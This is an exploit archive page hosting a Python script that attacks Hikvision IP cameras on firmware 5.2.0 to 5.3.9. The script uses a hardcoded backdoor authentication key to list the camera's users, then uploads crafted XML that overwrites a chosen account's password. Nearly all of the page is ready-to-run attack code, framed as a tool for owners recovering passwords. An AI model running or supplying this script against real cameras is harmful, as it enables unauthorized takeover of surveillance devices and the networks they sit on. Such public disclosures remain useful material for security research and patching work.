exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hikvision IP Camera 5.3.9 Access Control Bypass

Hikvision IP Camera 5.3.9 Access Control Bypass
Posted Mar 26, 2018
Authored by Matamorphosis

Hikvision IP Camera versions 5.2.0 through 5.3.9 (builds 140721 up until 170109) suffer from an access control bypass vulnerability.

tags | exploit, bypass
SHA-256 | 7af92b119967a688ba007849fccd93f43c5fcb2a0a609765db006f3999450a9f

Hikvision IP Camera 5.3.9 Access Control Bypass

Change Mirror Download
# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor
# Date: 15-03-2018
# Vendor Homepage: http://www.hikvision.com/en/
# Exploit Author: Matamorphosis
# Category: Web Apps
# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner recover their password.
# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23

#!/usr/bin/env python
# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]

import requests
import re
import sys

# BASIC INFO

newPass = "@Dm1N1$Tr80R" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.
BackdoorAuthArg = "auth=YWRtaW46MTEK"; # AUTHENTICATION KEY.
ip = ""
port = 0
SSL = ""
userID = ""
userName = ""

def Usage():
print("[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]")

try:
ip = sys.argv[1]
SSL = sys.argv[3]

except:
print("[-] One or more of the arguments is missing.")
Usage()
sys.exit()

ipmatch = re.search(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", ip) # IP ADDRESS REGULAR EXPRESSION.

if not ipmatch:
print("[-] The entered ip address " + ip + " is not in the correct format.")
Usage()
sys.exit()

try:
port = int(sys.argv[2])

except:
print("[-] The entered port " + sys.argv[2] + " is not a number.")
Usage()
sys.exit()

if (port == 0) or (port > 65535):
print("[-] The entered port " + sys.argv[2] + " is not a valid port number.")
Usage()
sys.exit()

if SSL == "Y":
protocol = "https"

else:
protocol = "http"

URLBase = protocol + "://" + ip + ":" + str(port) + "/" # URL BASE FOR FUTURE REQUESTS.
URLDownload = URLBase + "Security/users?" + BackdoorAuthArg # DOWNLOAD REQUEST.

print("[+] Getting User List.")

DownloadResponse = requests.get(URLDownload).text

for line in DownloadResponse: # RETRIEVING USER LIST
useridmatch = re.search(r"<id>(.*)<\/id>", line) # CHECK FOR USER ID.
usernamematch = re.search(r"<userName>(.*)<\/userName>", line) # CHECK FOR USER NAME.

if useridmatch:
userID = useridmatch.group(1)
print("[+] User ID: " + userID)

if usernamematch:
userName = usernamematch.group(1)
print("[+] Username: " + userName)

userID = raw_input("[?] Which User ID would you like to use? ")
userName = raw_input("[?] Which Username would you like to use? ")

print("[+] Using the User " + userName + ".")

userXML = ( '<User version=""1.0"" xmlns=""http://www.hikvision.com/ver10/XMLSchema"">\r\n<id>' + userID + '</id>\r\n<userName>' + userName + '</userName>\r\n<password>' + newPass + '</password>\r\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE

#print(userXML)

URLUpload = URLBase + "Security/users/" + userID + "?" + BackdoorAuthArg # UPLOAD REQUEST.

print("[+] Changing Password now.")

print requests.put(URLUpload, data=userXML).text # UPLOAD REQUEST, SENDING THE PAYLOAD.

print("[+] Complete. Please try logging in with these credentials. Username: " + userName + "Password: " + newPass)

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close